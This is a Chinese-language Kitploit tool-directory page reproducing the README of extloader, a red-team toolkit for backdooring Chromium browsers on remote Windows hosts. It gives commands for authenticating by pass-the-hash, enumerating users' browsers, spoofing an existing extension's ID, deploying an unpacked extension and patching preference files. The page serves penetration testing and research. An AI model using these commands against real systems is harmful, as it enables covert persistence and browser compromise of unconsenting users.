Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
extloader — 一个 Chromium 扩展漏洞利用工具包 | Kitploit
工具/GitHubGitHub/synacktiv/extloader
持久化机制漏洞利用Web应用程序漏洞利用信息收集后渗透利用渗透测试红队
GitHubsynacktiv/extloader

extloader

一个 Chromium 扩展漏洞利用工具包

查看仓库
262711个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

extLoader

一个用于管理和部署未打包 Chromium 扩展的小型工具包。

更多信息请参阅以下博客文章:https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways

安装

直接安装(pipx)

root@kitploit:~
pipx install .
extloader --help

使用 pipx 进行面向 Python 3.10+ 的隔离安装。

开发环境搭建(uv)

root@kitploit:~
uv venv
source .venv/bin/activate
uv pip install -e .

身份验证选项

  • 密码:-p/--password
  • 哈希:-H/--hash(LM:NT 格式或仅 NT)
  • 域:-d/--domain(默认为 WORKGROUP)

常用参数

  • -t, --target:目标 IP/主机名
  • -u, --username:用户名
  • -i, --index:来自 check 命令的用户索引
  • --debug:启用调试日志

使用方法

以下是一个部署扩展的分步示例:

  1. 首先,检查可用目标:
root@kitploit:~
# This will list available users and browsers
extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local

┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ Index  ┃ Browser         ┃ User (SID)                                                   ┃
┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│   1    │ Chrome          │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
│   2    │ Microsoft Edge  │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
└────────┴─────────────────┴──────────────────────────────────────────────────────────────┘

在另一台机器上运行 exploit 时,务必先运行 check 命令以刷新上下文(available_targets.json)。

  1. 准备 manifest(签名或伪造 ID):
root@kitploit:~
# Create a deterministic crx_id by adding a key to the manifest.json
extloader sign --extension ./my-extension

若要伪造现有扩展 ID,请跳过上述命令,并将 manifest key 设置为你所模仿扩展的 base64 公钥。复用该 密钥可保持 CRX ID 不变。

  1. 部署扩展:
root@kitploit:~
# Deploy to user index 1 (Chrome of john.doe)
extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension

4.(备选)打包以手动部署:

root@kitploit:~
# Bundle the signed extension with the captured Preferences file
extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"

# This creates a ZIP containing:
# - Signed extension files
# - Updated preferences files
# - Deployment instructions

--prefs-file 需要你备份的浏览器配置文件偏好(Chrome/Edge 将其存储为 Secure Preferences,其他 Chromium 浏览器使用 Preferences)。加载器会复制并修补该文件,然后将修改版和未修改版都包含在包中。

root@kitploit:~
├── extension/
│   └── chrome-mv3/
├── preferences/
│   ├── brave/
│   ├── chrome/
│   ├── chromium/
    [...]
└── info.json
  1. 如需恢复原始偏好设置:
root@kitploit:~
# Restore original preferences for user index 1 (need check command to get the correct context)
extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences

TODO

  • Kerberos 支持
  • nxc 模块
  • 将 package 工作流适配到 Linux
  • 将 package 工作流适配到 macOS
下载工具